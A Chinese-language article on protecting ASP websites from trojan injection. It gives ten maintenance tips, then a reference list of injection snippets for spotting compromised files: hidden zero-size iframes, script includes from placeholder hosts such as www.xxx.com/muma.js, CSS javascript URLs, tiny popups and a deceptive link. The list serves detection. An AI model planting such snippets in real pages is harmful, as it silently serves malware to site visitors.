[原創]怎樣讓網站避免被掛馬
1、建議通過FTP來上傳和維護網頁,盡量不安裝ASP的上傳程序。 2、對ASP上傳程序的調用一定要進行身份認證,并設置只允許信任的人使用上傳程序。 3、ASP程序管理員的用戶名和密碼不能是弱密碼并且要定期更換。 4、到正規網站下載ASP程序,下載后修改數據庫名稱和存放路徑,數據庫的文件名稱也要相對難些。 5、盡量保持程序是最新版本。 6、網頁不加注后臺管理程序登陸頁面鏈接。 7、維護后刪除后臺管理程序的登陸頁面,下次維護時再通過FTP上傳。 8、要定期備份數據庫等重要文件。 9、平時要多維護并注意空間中是否有來歷不明的ASP文件。 10、發現被入侵時,除非能識別出所有木馬文件,不然最好刪除所有文件。 重新上傳文件前,所有ASP程序用戶名和密碼都要重置,并且重新修改程序數據庫名稱和存放路徑以及后臺管理程序的路徑。 做好防范措施網站就會相對比較安全,但也不能疏忽大意,因為入侵與反入侵是一場持久戰。 掛馬代碼大全(檢查文件是否被掛馬時可參考) 一、框架掛馬 <iframe src=地址 width=0 height=0></iframe> 二、JS文件掛馬 首先將以下代碼 document.write(“<iframe width=’0′ height=’0′ src=’地址’></iframe>”); 保存為xxx.js, 則JS掛馬代碼為 <script language=javascript src=xxx.js></script> 三、JS變形加密 <script language=”Jscript.Encode” src=http://www.xxx.com/muma.txt></script> muma.txt可改成任意后綴 四、Body掛馬 <body ></body> 五、隱蔽掛馬 top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<iframe src=”http://www.xxx.com/muma.htm/”></iframe>’; 六、CSS掛馬 body { background-image: url(‘javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)} 七、JAJA掛馬 <script language=javascript> window.open (“地址”,”",”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1″); </script> 八、圖片偽裝 <html> <iframe src=”網馬地址” height=0 width=0></iframe> <img src=”圖片地址”></center> </html> 九、偽裝調用: <frameset rows=”444,0″ cols=”*”> <frame src=”打開網頁” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″> <frame src=”網馬地址” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″> </frameset> 十、高級欺騙 <a href=”http://www.163.com(迷惑連接地址,顯示這個地址指向木馬地址)” > 頁面要顯示的內容 </a> <script Language=”Javascript”> function www_163_com () { var url=”網馬地址”; open(url,”NewWindow”,”toolbar=no,location=no,directories=no, status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10″); } </script>
|
|||
| >> 相關文章 | |||
浙公網安備 33048302000166號
